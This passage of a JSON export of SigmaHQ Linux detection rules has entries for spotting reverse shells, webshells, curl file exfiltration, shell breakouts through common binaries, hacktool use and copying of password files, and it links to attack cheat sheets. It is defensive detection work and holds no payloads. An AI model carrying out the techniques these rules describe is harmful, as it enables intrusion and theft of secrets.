"fa4aaed5-4fe0-498d-bbc0-08e3346387ba", "value": "Copy Passwd Or Shadow From TMP Path" }, { "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2022-12-26", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_groupdel.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://linux.die.net/man/8/groupdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "value": "Group Has Been Deleted Via Groupdel" }, { "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_services_stop_and_disable.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", "value": "Disable Or Stop Services" }, { "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", "meta": { "author": "Tuan Le (NCSGroup)", "creation_date": "2022-12-26", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_userdel.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", "value": "User Has Been Deleted Via Userdel" }, { "description": "Detects execution of binaries located in potentially suspicious locations via \"nohup\"", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_nohup_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" ], "tags": [ "attack.execution" ] }, "uuid": "457df417-8b9d-4912-85f3-9dbda39c3645", "value": "Suspicious Nohup Execution" }, { "description": "Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_find_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/find/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6adfbf8f-52be-4444-9bac-81b539624146", "value": "Shell Execution via Find - Linux" }, { "description": "Detects a suspicious curl process start on linux with set useragent options", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts created by developers and admins", "Administrative activity" ], "filename": "proc_creation_lnx_susp_curl_useragent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86d356d-6093-443d-971c-9b07db583c68", "value": "Suspicious Curl Change User Agents - Linux" }, { "description": "Detects attempts to force stop the ufw using ufw-init", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-18", "falsepositive": [ "Network administrators" ], "filename": "proc_creation_lnx_disable_ufw.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84c9e83c-599a-458a-a0cb-0ecce44e807a", "value": "Ufw Force Stop Using Ufw-Init" }, { "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vsan_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html", "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d54c2f06-aca9-4e2b-81c9-5317858f4b79", "value": "ESXi VSAN Information Discovery Via ESXCLI" }, { "description": "Detects known hacktool execution based on image name.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])", "creation_date": "2023-01-03", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_susp_hktl_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/Pennyw0rth/NetExec/", "https://github.com/t3l3machus/hoaxshell", "https://github.com/HavocFramework/Havoc", "https://github.com/t3l3machus/Villain", "https://github.com/carlospolop/PEASS-ng", "https://github.com/pathtofile/bad-bpf", "https://github.com/Gui774ume/ebpfkit", "https://github.com/Ne0nd0g/merlin", "https://github.com/1N3/Sn1per", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml" ], "tags": [ "attack.execution", "attack.resource-development", "attack.t1587" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a015e032-146d-4717-8944-7a1884122111", "value": "Linux HackTool Execution" }, { "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_security_software_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", "value": "Security Software Discovery - Linux" }, { "description": "Detects the use of the \"flock\" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_flock_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/flock/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b09c71e-4269-4111-9cdd-107d8867f0cc", "value": "Shell Execution via Flock - Linux" }, { "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_process_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1057" ] }, "related": [ { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e2f5868-08d4-413d-899f-dc2f1508627b", "value": "Process Discovery" }, { "description": "Detects the use of grep to discover specific files created by the GobRAT malware", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e34cfa0c-0a50-4210-9cb3-5632d08eb041", "value": "Potential GobRAT File Discovery Via Grep" }, { "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_php_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", "value": "Potential PHP Reverse Shell" }, { "description": "Detects suspicious sub processes of web server processes", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-10-15", "falsepositive": [ "Web applications that invoke Linux command line tools" ], "filename": "proc_creation_lnx_webshell_detection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" ], "tags": [ "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", "value": "Linux Webshell Indicators" }, { "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_network_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33e814e0-1f00-4e43-9c34-31fb7ae2b174", "value": "ESXi Network Configuration Discovery Via ESXCLI" }, { "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", "meta": { "author": "Sittikorn S, Teoderick Contreras", "creation_date": "2022-01-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_doas_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "067d8238-7127-451c-a9ec-fa78045b618b", "value": "Linux Doas Tool Execution" }, { "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_dockerenv_recon.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11701de9-d5a5-44aa-8238-84252f131895", "value": "Docker Container Discovery Via Dockerenv Listing" }, { "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_ruby_reverse_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b8bdac18-c06e-4016-ac30-221553e74f59", "value": "Potential Ruby Reverse Shell" }, { "description": "Detects the enumeration of other remote systems.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_remote_system_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11063ec2-de63-4153-935e-b1a8b9e616f1", "value": "Linux Remote System Discovery" }, { "description": "Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_gcc_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/gcc/#shell", "https://gtfobins.github.io/gtfobins/c89/#shell", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/c99/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b5de532-a757-4d70-946c-1f3e44f48b4d", "value": "Shell Execution GCC - Linux" }, { "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem", "meta": { "author": "Seth Hanford", "creation_date": "2023-08-23", "falsepositive": [ "Legitimate system administrator usage of these commands", "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" ], "filename": "proc_creation_lnx_susp_container_residence_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "746c86fb-ccda-4816-8997-01386263acc4", "value": "Container Residence Discovery Via Proc Virtual FS" }, { "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_install_root_certificate.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78a80655-a51e-4669-bc6b-e9d206a462ee", "value": "Install Root Certificate" }, { "description": "Detects the use of \"vim\" and it's siblings commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_vim_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/rvim/", "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/vimdiff/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", "value": "Vim GTFOBin Abuse - Linux" }, { "description": "Detects a suspicious curl process start the adds a file to a web request", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts created by developers and admins" ], "filename": "proc_creation_lnx_susp_curl_fileupload.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://curl.se/docs/manpage.html", "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://twitter.com/d1r4c/status/1279042657508081664", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ "attack.exfiltration", "attack.t1567", "attack.t1105" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "value": "Suspicious Curl File Upload - Linux" }, { "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "meta": { "author": "Ömer Günal, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_file_deletion.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57", "value": "File Deletion" }, { "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", "meta": { "author": "Ömer Günal, Alejandro Ortuno, oscd.community", "creation_date": "2020-10-11", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_local_groups.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_local_groups.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "676381a6-15ca-4d73-a9c8-6a22e970b90d", "value": "Local Groups Discovery - Linux" }, { "description": "Detects installation of suspicious packages using system installation utilities", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-03", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_install_suspicioua_packages.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "700fb7e8-2981-401c-8430-be58e189e741", "value": "Suspicious Package Installed - Linux" }, { "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", "meta": { "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-07", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_perl_reverse_shell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "259df6bc-003f-4306-9f54-4ff1a08fa38e", "value": "Potential Perl Reverse Shell Execution" }, { "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-06", "falsepositive": [ "Administrators or installed processes that leverage nohup" ], "filename": "proc_creation_lnx_nohup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://en.wikipedia.org/wiki/Nohup", "https://gtfobins.github.io/gtfobins/nohup/", "https://www.computerhope.com/unix/unohup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "value": "Nohup Execution" }, { "description": "Detects user account creation on ESXi system via esxcli", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-08-22", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_user_account_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", 